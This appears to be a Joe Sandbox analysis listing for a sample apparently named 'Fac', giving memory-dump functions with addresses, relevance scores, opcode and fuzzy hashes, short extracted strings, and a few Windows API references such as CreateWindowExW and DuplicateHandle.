Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b031ae9cfdc668be974eff5396e2d7df339ed6c17e46db4371dfee7ddf62454
Instruction ID: 78ed8aad5acb41adc2379f6525836dfe0f01c86481be92fe0304d4310d30b4ad
Opcode Fuzzy Hash: 1b031ae9cfdc668be974eff5396e2d7df339ed6c17e46db4371dfee7ddf62454
Instruction Fuzzy Hash: A6C1C378E01218CFDB54DFA5C940BADBBB2BF89300F2081A9D409AB364DB359E81CF55

Function 36FB2300 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c48d21b0c5af152a89fc60e68a61f28d48403f72f15b466279f6a566b61c0870
Instruction ID: b670a1df0ff45cde3102da388b106c3548e224be76fddfcebf24d826b75c7f52
Opcode Fuzzy Hash: c48d21b0c5af152a89fc60e68a61f28d48403f72f15b466279f6a566b61c0870
Instruction Fuzzy Hash: 9AC1B378E01218CFDB54DFA5C950BADBBB2BF89300F2081A9D408AB365DB359E85CF55

Function 36C3F8D8 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480379797.0000000036C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 36C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36c30000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 059f108e83d9ecba08a4e553bad45f2b6b6f8cb0dafeaca856814b93759863e2
Instruction ID: 1e21fbfc0ef21012427448cdee257f4d593e25d0dd01c313970cfe6d7273ac18
Opcode Fuzzy Hash: 059f108e83d9ecba08a4e553bad45f2b6b6f8cb0dafeaca856814b93759863e2
Instruction Fuzzy Hash: 13C1C278E01218CFDB54DFA5C940B9DBBB2BF89300F2081A9D818AB365DB359E81CF51

Function 36C32968 Relevance: .3, Instructions: 268COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480379797.0000000036C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 36C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36c30000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 762c118c84a7726ab1dbbe12b88949d8b8b7bffe5e2f6ef4a718cb267955bf67
Instruction ID: 25f2f8449308ec60bab3ccd9bb4be7cf94db754bd619d32db8082a323a87618e
Opcode Fuzzy Hash: 762c118c84a7726ab1dbbe12b88949d8b8b7bffe5e2f6ef4a718cb267955bf67
Instruction Fuzzy Hash: 0DC1A278E01218CFDB54DFA5C944B9DBBB2FF88304F2081A9D809A7365DB355A81CF55

Function 36C32DC8 Relevance: .2, Instructions: 220COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480379797.0000000036C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 36C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36c30000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b3b40294496d860a46c85ff05bc6d454dcff9aa965207d9239730dd05331c47c
Instruction ID: 0c5e7923efd9f609db1d76fd3e73af26fa90cdcb2894046cb8b33fbd536f0361
Opcode Fuzzy Hash: b3b40294496d860a46c85ff05bc6d454dcff9aa965207d9239730dd05331c47c
Instruction Fuzzy Hash: F5A11374D00208CFEB14DFA9C844BDDBBB2FF89304F208269E509AB2A5DB759985CF55

Function 36C32DC3 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480379797.0000000036C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 36C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36c30000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4eabbc5cb269d041779216dd52720835be80bbde974d4ab916744a39caba2065
Instruction ID: ccd2dde08aafe2c30d31204ae37a5201fef7ea8e74574e07695b84fbef03d8a0
Opcode Fuzzy Hash: 4eabbc5cb269d041779216dd52720835be80bbde974d4ab916744a39caba2065
Instruction Fuzzy Hash: 9DA11474D00208CFEB14DFA9C844BDDBBB2FF89304F208269E509AB295DB759985CF54

Function 36C3310E Relevance: .2, Instructions: 202COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480379797.0000000036C30000.00000040.00000800.00020000.00000000.sdmp, Offset: 36C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36c30000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe15db16e869ce161a7bdf1c03c2396687307a71ace110fc3c3c1ecf531745d3
Instruction ID: 235e231fd42684a82bae4872027bcd4ab6ae3d0592f78d121204046482888442
Opcode Fuzzy Hash: fe15db16e869ce161a7bdf1c03c2396687307a71ace110fc3c3c1ecf531745d3
Instruction Fuzzy Hash: 1091F074D00258CFEB10DFA9C884BDDBBB1FF49314F208269E509AB291DB799985CF54

Function 3700F668 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 583d22354a9158d3b91428aadb68015abb6aa495e8970bb9b23b0dc49cf66033
Instruction ID: 3bb3674c5ce75011c9c13cc6e843e35754fc73845faed495aaf0a2cab2487640
Opcode Fuzzy Hash: 583d22354a9158d3b91428aadb68015abb6aa495e8970bb9b23b0dc49cf66033
Instruction Fuzzy Hash: F181AF78E00218CBEB54DFA5C890BADBBB2FF89300F608129D414BB3A4DB356946DF55

Function 3700F988 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63986fa6f39f045b3645f23a9e17b284103d1d9a67a85013192438a539cf5112
Instruction ID: b09ccfb8fa9bb62bf76a9b7848d13968649e07f83464637339e505229b43af8c
Opcode Fuzzy Hash: 63986fa6f39f045b3645f23a9e17b284103d1d9a67a85013192438a539cf5112
Instruction Fuzzy Hash: 8B81A074E00218CBEB54DFA5C890B9DBBB2FF89300F608129D818BB394DB356946DF55

Function 37007FA8 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a2f19ee6262ab2f281dc8ae822d997e13c4650cc589fdfb49e7dc1ede9d7df7
Instruction ID: 32d998699f9efaa7c19811de7212f12eaa171b9a4ea7837f928bb88465dde7a6
Opcode Fuzzy Hash: 6a2f19ee6262ab2f281dc8ae822d997e13c4650cc589fdfb49e7dc1ede9d7df7
Instruction Fuzzy Hash: 79819F78E00218CBEB54DFA5C890BADBBB2FF89300F608169D414BB3A4DB355946DF55

Function 36FD70C0 Relevance: .2, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e7a1f8f95eadad86deeb392ebb09701503eba675979b500e52bf1ca232d4a69
Instruction ID: 579fc6fde9ec19c336c378848b2d9910c139429a29d01e29226fee7751ba4804
Opcode Fuzzy Hash: 2e7a1f8f95eadad86deeb392ebb09701503eba675979b500e52bf1ca232d4a69
Instruction Fuzzy Hash: CF81A274E00218CBEB14DFA5C890B9DBBB2FF89304F648529D818BB398DB359946CF55

Function 0015E978 Relevance: .1, Instructions: 148COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 92df9f1de8c34b9149f982a3e84b28ea788f73deec962571da7db52d894b86e3
Instruction ID: 2fc298543ebfe8b6a192934fc0eed930caee5ed28f7a31500456262dc5985fc0
Opcode Fuzzy Hash: 92df9f1de8c34b9149f982a3e84b28ea788f73deec962571da7db52d894b86e3
Instruction Fuzzy Hash: 5351B574E00208DFEB18DFB6D444A9DBBB2FF89301F248129E819AB3A5DB305946CF15

Function 0015E988 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0feb873598cd40f728279d3c40a7cd5d164db65366247174f4befacd18ccd668
Instruction ID: 158f3d8ad9708add8eb74745e1b5bb6738ab56c30d6593b83d6e2c1a4d813a19
Opcode Fuzzy Hash: 0feb873598cd40f728279d3c40a7cd5d164db65366247174f4befacd18ccd668
Instruction Fuzzy Hash: 1C518574E00208DFDB18DFB6D454A9DBBB2BF88300F248129E819AB365DB305946CF55

Function 36FBA6D8 Relevance: .1, Instructions: 111COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 96967ba7804d8a4bd88c8f14e9a5639ac09e4506dab2d564e4b6d70288cd2548
Instruction ID: bd8d38e449d5a4f3658ebd0aa745a26a46249fb5ac54188926f6f2fe2a2f8661
Opcode Fuzzy Hash: 96967ba7804d8a4bd88c8f14e9a5639ac09e4506dab2d564e4b6d70288cd2548
Instruction Fuzzy Hash: 4F41DEB4E016188BEB18CFAAC8407DDBBF2BF89304F64C56AC418BB294DB754946CF54

Function 36FBA6E7 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de2fa59484c556de8e356f6f3ad5c28cf3d371f922347d904149b15915d1ac07
Instruction ID: 7fb782fe22dace1fa410b6be5fd71f170411e7f07839a97565d1672aa5165f93
Opcode Fuzzy Hash: de2fa59484c556de8e356f6f3ad5c28cf3d371f922347d904149b15915d1ac07
Instruction Fuzzy Hash: 8341C0B4D006188BEB18CFAAC8447DDBBF2AF89300F20C56AC418BB294DB754946CF54

Function 36FE2D9A Relevance: .1, Instructions: 108COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98a401a9f4fd8a44332a625cea39dc4f34fd5f63fbcac9e7c0b3f4022e34c94a
Instruction ID: 04bee5ad7ae0c5b5d15ff88c5ae4028dc933fe7f491c2de442f8ba4a326321f7
Opcode Fuzzy Hash: 98a401a9f4fd8a44332a625cea39dc4f34fd5f63fbcac9e7c0b3f4022e34c94a
Instruction Fuzzy Hash: FF41F575E016588BEB18CFAAC8446DDFBF2AF89300F20D52AC418BB259EB344946CF54

Function 36FBAD31 Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4969d70354ef574ca429dd2390efaf9b4fa6e827a4467ca100b3a58284d835b
Instruction ID: 2ed87c80f3b03faf3d6a23f3a9bb222b9d0042710fd0d5e408e2b980857ca8d3
Opcode Fuzzy Hash: f4969d70354ef574ca429dd2390efaf9b4fa6e827a4467ca100b3a58284d835b
Instruction Fuzzy Hash: 9641D475E012188BEF18CFAAD8506DDFBF2AF89300F24D52AC418BB258DB344946CF54

Function 37001817 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480841803.0000000037000000.00000040.00000800.00020000.00000000.sdmp, Offset: 37000000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37000000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b8ca2d637e3d42ad50cbd69d335e75770e144fda1706f8ec4619230c9f47a50c
Instruction ID: 2227aed84acab970ac727489f9829e4419c515a0be2699b9a82677999b7dd06d
Opcode Fuzzy Hash: b8ca2d637e3d42ad50cbd69d335e75770e144fda1706f8ec4619230c9f47a50c
Instruction Fuzzy Hash: 6641D574E006188BEB18DFAAD8547DDBBF2BF89310F24C16AD418BB254EB345946CF54

Function 36FB52BB Relevance: .1, Instructions: 101COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480576368.0000000036FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fb0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d080ff67be8f3e0935c8acb3f755b7127ca457831c2a8ab20c8e9023702d68
Instruction ID: 515fcb3a1e637d065df353d91ab2937988a907b164735ad74bce2113ecb5b139
Opcode Fuzzy Hash: 52d080ff67be8f3e0935c8acb3f755b7127ca457831c2a8ab20c8e9023702d68
Instruction Fuzzy Hash: 5B41B475E016488BEF18CFAAD9506EDFBF2AF89300F20D52AC415BB258DB385946CF54

Function 36FE61E5 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.43480729407.0000000036FE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FE0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fe0000_Fac.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 22f7e577cf8e5788ebe3573163dad7d986a4d32a98420e43e038add08964ecce
Instruction ID: 71ddc9a7e7049defc3bbb69206978db4485316c3830a4cf3bc4fbb517ffd0a65
Opcode Fuzzy Hash: 22f7e577cf8e5788ebe3573163dad7d986a4d32a98420e43e038add08964ecce
Instruction Fuzzy Hash: B541C275E002188BEB58CFAAD8547DDBBF2BF89300F20D52AC418BB258EB345946CF54

Function 001576F1 Relevance: 10.5, Strings: 8, Instructions: 475
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

(oq, xrefs: 00157BFF
(oq, xrefs: 00157815
,q, xrefs: 00157B90
,q, xrefs: 00157BA0
(oq, xrefs: 0015772E
(oq, xrefs: 001577E9
(oq, xrefs: 001578B2
(oq, xrefs: 00157C0F

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: (oq$(oq$(oq$(oq$(oq$(oq$,q$,q
API String ID: 0-2212926057
Opcode ID: bf14666075185d4ef6a2e68f13f4886dd916e91fa3003574f11e50c38c3bb169
Instruction ID: c3cfdff7f38c3466dc76c0feb31860b3d699f160f46a7eda19fd9fed3b040ac9
Opcode Fuzzy Hash: bf14666075185d4ef6a2e68f13f4886dd916e91fa3003574f11e50c38c3bb169
Instruction Fuzzy Hash: A2126A30A04209CFCB25CF68E895AAEBBF1FF48315F158599E829DB2A1D731ED45CB50

Function 37049732 Relevance: 6.1, APIs: 4, Instructions: 139
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 370497BE
GetCurrentThread.KERNEL32 ref: 370497FB
GetCurrentProcess.KERNEL32 ref: 37049838
GetCurrentThreadId.KERNEL32 ref: 37049891

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9cbfb05b7d63436bbd3b1939babd8d0ad83a1c0670286e0a96234fb55e72500d
Instruction ID: 910d30d91fffc94a55be5554b3ba0d0206427b9642729dc7225762593a206b3b
Opcode Fuzzy Hash: 9cbfb05b7d63436bbd3b1939babd8d0ad83a1c0670286e0a96234fb55e72500d
Instruction Fuzzy Hash: 305175B4D043489FDB10CFAAC488BAEBBF0BF88310F2084A9E449B7651D7356945CF26

Function 37049740 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 370497BE
GetCurrentThread.KERNEL32 ref: 370497FB
GetCurrentProcess.KERNEL32 ref: 37049838
GetCurrentThreadId.KERNEL32 ref: 37049891

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 9ff4cbe3c37ebeba8a3d8c2e321bb6aaa92576bb412268ece29d849aa6d27208
Instruction ID: 66943f2e5721096bade92d016d9773567eaaaf92807b3fe7d704258f92487621
Opcode Fuzzy Hash: 9ff4cbe3c37ebeba8a3d8c2e321bb6aaa92576bb412268ece29d849aa6d27208
Instruction Fuzzy Hash: EB5165B4D042489FDB10CFAAC488B9EBBF0BB88314F20886DE449B7651D7356944CF26

Function 00158490 Relevance: 3.2, Strings: 2, Instructions: 703
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

$q, xrefs: 00158FD7
$q, xrefs: 00158FB4

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: $q$$q
API String ID: 0-3126353813
Opcode ID: 8b24d1b0e56fa19244433233a522c44955a5df41dfb10a122e41f6310fadae05
Instruction ID: d1ffb010b80dda09f3976b2768d434a1a29d4ffa4474a71c7bc1881983a79bde
Opcode Fuzzy Hash: 8b24d1b0e56fa19244433233a522c44955a5df41dfb10a122e41f6310fadae05
Instruction Fuzzy Hash: A4521C34A002188FEF649BB4C850B9EBB72FF85304F1085A9D54A6B3A5CF355E46DFA1

Function 00155F38 Relevance: 2.8, Strings: 2, Instructions: 327COMMON

Download Yara Rule

Strings

Hq, xrefs: 00156056
Hq, xrefs: 00156023

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: Hq$Hq
API String ID: 0-925789375
Opcode ID: 114dd071ca533b677b9066f25bf7333477c219cb85eac6f555c981ded6264b6f
Instruction ID: 182574b76cfc4656e8375a320c1ba3b9a11da9c79e04dc10facc6921756487e4
Opcode Fuzzy Hash: 114dd071ca533b677b9066f25bf7333477c219cb85eac6f555c981ded6264b6f
Instruction Fuzzy Hash: 79B19D30704210CFDB159B34C894B7A7BB6AFC8302F59456AE81ACB3A5DB34CC8AD791

Function 36FDE940 Relevance: 2.7, Strings: 2, Instructions: 245COMMON

Download Yara Rule

Strings

LRq, xrefs: 36FDE95C
LRq, xrefs: 36FDEA89

Memory Dump Source

Source File: 00000002.00000002.43480674108.0000000036FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 36FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_36fd0000_Fac.jbxd

Similarity

API ID:
String ID: LRq$LRq
API String ID: 0-3710822783
Opcode ID: c5d25c4bf3383d83ee670119ae0189dab4b02e11cd3a5ecc86d401ace09d12fb
Instruction ID: dc5a79c2f5f474427f06ee56affa0cc393fc7e0ec9732123c50747b0001dc791
Opcode Fuzzy Hash: c5d25c4bf3383d83ee670119ae0189dab4b02e11cd3a5ecc86d401ace09d12fb
Instruction Fuzzy Hash: A581A035B002158FDB04DB79C894A6E7BF2BF88658B254569E006DB3A9DB31EC02CB91

Function 00156498 Relevance: 2.7, Strings: 2, Instructions: 232COMMON

Download Yara Rule

Strings

,q, xrefs: 0015656E
,q, xrefs: 00156578

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: ,q$,q
API String ID: 0-1667412543
Opcode ID: 22989f0adb1083d21c3f9cf775f21e103c403518f4646de269c9ef3249410f20
Instruction ID: bfd43cdc44e5ed1045550d75ac201585b82835c9f2c2b5ab60dff58204a7afc1
Opcode Fuzzy Hash: 22989f0adb1083d21c3f9cf775f21e103c403518f4646de269c9ef3249410f20
Instruction Fuzzy Hash: 5E81BF34A00505CFDB58CF69C484A69BBB2BF89302BA58169D825DB365DB31EC49CBA1

Function 00153C90 Relevance: 2.6, Strings: 2, Instructions: 90COMMON

Download Yara Rule

Strings

Xq, xrefs: 00153CF6
Xq, xrefs: 00153CCD

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: 48643a207ac8acf17c81f3601f5686442711ff4c31795089570351203755c318
Instruction ID: e26dec4eaf4d43cffd81a9eb9781dccb3120c38a98543d6876865b597c941c02
Opcode Fuzzy Hash: 48643a207ac8acf17c81f3601f5686442711ff4c31795089570351203755c318
Instruction Fuzzy Hash: 8C210E307083944FDB2646B9486066AABBAAFC2381F68406FCC75DF1A2DF54CD099372

Function 00153CC0 Relevance: 2.6, Strings: 2, Instructions: 69COMMON

Download Yara Rule

Strings

Xq, xrefs: 00153CF6
Xq, xrefs: 00153CCD

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: Xq$Xq
API String ID: 0-1556399337
Opcode ID: bee7e293e306b0211b7cc94e0501801eff0fbfe2fad154e5a55eb2679409e0ec
Instruction ID: 97dd96fda1afc1849694e96c7d1629cf307855de4aaada23a4acf7046a2c5b8b
Opcode Fuzzy Hash: bee7e293e306b0211b7cc94e0501801eff0fbfe2fad154e5a55eb2679409e0ec
Instruction Fuzzy Hash: 0811A730B003148BEB3956EA445163B92FEFBD03D2F68403ADD3A9B250DF61CE0A52A1

Function 00159D59 Relevance: 2.5, Strings: 2, Instructions: 44COMMON

Download Yara Rule

Strings

4'q, xrefs: 00159D84
4'q, xrefs: 00159D6D

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: 82555bcdbfa5030dc8c6d66526395fcbb4ce45875b97cc1021766d889315fdae
Instruction ID: e81af2acf02d350b02dacd89752e318686378ee31e3b6be1e2b40e815ff1d64f
Opcode Fuzzy Hash: 82555bcdbfa5030dc8c6d66526395fcbb4ce45875b97cc1021766d889315fdae
Instruction Fuzzy Hash: 4FF04435300215AFDB181BA69855A7ABA9BEBC8361B148029FD4AC7351DF61CC5583A1

Function 00150CA0 Relevance: 1.8, Strings: 1, Instructions: 539COMMON

Download Yara Rule

Strings

LRq, xrefs: 00150F19

Memory Dump Source

Source File: 00000002.00000002.43457423970.0000000000150000.00000040.00000800.00020000.00000000.sdmp, Offset: 00150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_150000_Fac.jbxd

Similarity

API ID:
String ID: LRq
API String ID: 0-3187445251
Opcode ID: e65e70d1bfefc4adc2637a0a040fbe30bb353ce3c838abf016b1463ed7536116
Instruction ID: 016a661c97f5e430f26f85aa00280a36989339086e5df649e485ed96e0acb5f6
Opcode Fuzzy Hash: e65e70d1bfefc4adc2637a0a040fbe30bb353ce3c838abf016b1463ed7536116
Instruction Fuzzy Hash: 3F52F678A00659CFDB54DF34DD94A9DBBB2FB48301F1081A9E409AB364DB346E86CF85

Function 37134287 Relevance: 1.6, APIs: 1, Instructions: 119COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371343A2

Memory Dump Source

Source File: 00000002.00000002.43481282332.0000000037130000.00000040.00000800.00020000.00000000.sdmp, Offset: 37130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37130000_Fac.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: a1b662f75d95683a35c34eac0eccf6bc72cbdf1f4584e714a497acd0840f71ef
Instruction ID: 9041d1a6c174e5a5fe9c3ea5bcb568fecca9f975510840766d96ab2d588c3ef6
Opcode Fuzzy Hash: a1b662f75d95683a35c34eac0eccf6bc72cbdf1f4584e714a497acd0840f71ef
Instruction Fuzzy Hash: D251E3B5C013599FEB15CF99C884ADEFFB5BF48354F24812AE818AB210D774A845CF91

Function 37134290 Relevance: 1.6, APIs: 1, Instructions: 113COMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 371343A2

Memory Dump Source

Source File: 00000002.00000002.43481282332.0000000037130000.00000040.00000800.00020000.00000000.sdmp, Offset: 37130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37130000_Fac.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 633a15a881c3fd235fa14a0784bc1df49ee55db580960acc282949dc89f9734f
Instruction ID: cf82c20e4d854094ba7765b20694c81c0d1013c10d0eb33b5b98fe5afadef6e7
Opcode Fuzzy Hash: 633a15a881c3fd235fa14a0784bc1df49ee55db580960acc282949dc89f9734f
Instruction Fuzzy Hash: 7D41D3B5C013489FEB15CF99C884ADEBBB5BF48350F20812AE819AB210D774A841CF90

Function 37131844 Relevance: 1.6, APIs: 1, Instructions: 97COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 37136AA1

Memory Dump Source

Source File: 00000002.00000002.43481282332.0000000037130000.00000040.00000800.00020000.00000000.sdmp, Offset: 37130000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37130000_Fac.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 86ee93a07cc1b83e0217c955164b0b9d67aa43ab9fc525d220f22246b7237e0e
Instruction ID: 57279f56142c8da811eb17f397da94a472fb3555d25b74429bb7878d2615a083
Opcode Fuzzy Hash: 86ee93a07cc1b83e0217c955164b0b9d67aa43ab9fc525d220f22246b7237e0e
Instruction Fuzzy Hash: 80415BB9900305DFEB50CF95C888BAABBF5FF88714F25C859D518AB321D774A841CBA0

Function 37049980 Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 37049A0F

Memory Dump Source

Source File: 00000002.00000002.43481111190.0000000037040000.00000040.00000800.00020000.00000000.sdmp, Offset: 37040000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37040000_Fac.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 6420ee30f8c285ae88ebee23fc43cd66887c868de051967b80e2d6684177fbc4
Instruction ID: 4512f53c91da77c519d894ad58670263f1c50167791b3bc9274eefa60d4f1e42
Opcode Fuzzy Hash: 6420ee30f8c285ae88ebee23fc43cd66887c868de051967b80e2d6684177fbc4
Instruction Fuzzy Hash: A021E7B5D00248AFDB10CFA9D984ADEBBF4FB48310F14845AE858A3310D374A950CFA5

